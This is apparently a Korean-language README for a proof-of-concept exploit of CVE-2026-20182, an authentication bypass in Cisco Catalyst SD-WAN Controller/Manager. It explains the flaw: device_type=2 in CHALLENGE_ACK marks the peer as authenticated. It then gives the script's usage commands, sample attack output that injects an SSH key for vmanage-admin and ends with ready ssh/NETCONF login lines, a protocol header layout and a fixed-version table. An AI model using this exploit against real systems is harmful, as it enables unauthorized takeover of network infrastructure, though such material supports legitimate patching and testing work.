
CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager 인증 우회 (CVSS 10.0)
CVE-2026-20182에 대한 개념 증명(PoC) 익스플로잇으로, Cisco Catalyst SD-WAN Controller(vSmart) 및 Manager(vManage)의 vdaemon DTLS 서비스(UDP/12346)에서 발생하는 치명적인(CVSS 10.0) 인증 우회 취약점입니다.
공개일: 2026년 5월 14일, Rapid7(Stephen Fewer & Jonah Burgess)
CISA KEV: 2026년 5월 14일 추가(긴급 지시 26-03)
CVSS: 10.0 — CWE-287: 부적절한 인증(Improper Authentication)
vdaemon 서비스는 다단계 DTLS 핸드셰이크를 사용하여 컨트롤 플레인 피어를 인증합니다. vbond_proc_challenge_ack() 함수는 장치 유형별 인증서 검증을 구현하지만, 장치 유형 2(vHub)에는 검증 코드 경로가 없습니다. device_type=2로 CHALLENGE_ACK를 전송하면 함수가 모든 조건문을 통과하여 무조건 peer->authenticated = 1로 설정합니다.
유효한 자격 증명, CA 서명 인증서, SD-WAN 배포에 대한 지식이 전혀 필요하지 않습니다.
MSG_VMANAGE_TO_PEER(msg_type=14)를 통해 에 SSH 공개 키를 주입합니다/home/vmanage-admin/.ssh/authorized_keysvmanage-admin으로 NETCONF 액세스(SSH TCP/830) 또는 SSH 액세스(TCP/22)를 부여합니다python3 cve-2026-20182.py -t <target> [options]
| 인자 | 설명 |
|---|---|
-t, --target | 대상 IP 또는 호스트 이름 |
--port | vdaemon UDP 포트(기본값: 12346) |
--key-file | 주입할 기존 SSH 공개 키의 경로(선택 사항) |
--netconf | SSH로 NETCONF에 연결하여 익스플로잇 성공 여부 검증 |
# 새 키 쌍을 생성하고 익스플로잇 수행
python3 cve-2026-20182.py -t 192.168.1.100
# 기존 공개 키 사용
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
# 익스플로잇 수행 후 NETCONF로 검증
python3 cve-2026-20182.py -t 192.168.1.100 --netconf
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...
[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]
| 릴리스 | 수정 버전 |
|---|---|
| < 20.9 | 지원되는 릴리스로 마이그레이션 |
| 20.9 | 20.9.9.1 |
| 20.10 | 20.12.7.1 |
| 20.11 | 20.12.7.1 |
| 20.12 | 20.12.5.4 / 20.12.6.2 / 20.12.7.1 |
| 20.13 | 20.15.5.2 |
| 20.14 | 20.15.5.2 |
| 20.15 | 20.15.4.4 / 20.15.5.2 |
| 20.16 | 20.18.2.2 |
| 20.18 | 20.18.2.2 |
| 26.1.1 | 26.1.1.1 |
cisco_sdwan_vhub_auth_bypass — Metasploit 프레임워크의 보조(auxiliary) 모듈vdaemon 프로토콜 헤더는 12바이트입니다:
| 오프셋 | 크기 | 필드 | 설명 |
|---|---|---|---|
| 0 | 1 | msg_type | 하위 니블 = 타입, 상위 니블 = 버전 |
| 1 | 1 | device_info | 상위 니블 = device_type, 하위 니블 = 플래그 |
| 2 | 1 | flags | 표준 값 0xA0 |
| 3 | 1 | padding | 항상 0x00 |
| 4-7 | 4 | domain_id | 빅엔디안 uint32 |
| 8-11 | 4 | site_id | 빅엔디안 uint32 |
장치 유형: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage
openssl CLI(DTLS 전송용)cryptography 라이브러리(pip install cryptography)이 익스플로잇은 명시적인 서면 허가를 받은 시스템에 대한 공인된 레드 팀 운영, 침투 테스트 및 보안 연구 목적으로만 제공됩니다. 무단 사용은 불법입니다.